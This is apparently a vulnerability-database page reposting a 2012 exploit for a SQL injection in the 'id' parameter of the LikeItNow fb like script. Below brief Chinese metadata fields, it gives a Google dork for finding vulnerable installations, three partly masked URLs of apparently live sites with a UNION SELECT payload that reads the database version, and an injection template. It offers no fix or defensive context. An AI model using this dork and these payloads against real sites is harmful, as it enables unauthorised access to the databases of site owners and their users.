LikeItNow fb like (like.php, id parameter) SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1046122 漏洞类型
发布时间 2012-11-17 更新时间 2012-11-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012110117
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: LikeItNow fb like (like.php, id parameter) SQL Injection
# Date: 17.11.2012
# Author: xStarCode
# Exploit Author: xStarCode
# Version: 1.0
# Category: webapps
# Google Dork: intitle:"LikeItNow - What do you like?"
# Tested on: Linux
# Demo site:
 
http://cXXmaidea.com/like/like.php?id=-1+UNION+SELECT+1,version(),3--
http://wwwXXercs.net/fb/like.php?id=-1+UNION+SELECT+1,version(),3--
http://maXXio.comule.com/like.php?id=-1+UNION+SELECT+1,version(),3--
# Vulnerable Parameters: id
#Exploit: www.example.com/like.php?id=[SQL Injection]
#
Author Mail: xstarcode@vpn.st
Author Website: www.xstarcode.wordpress.com
Xo xStarCode
#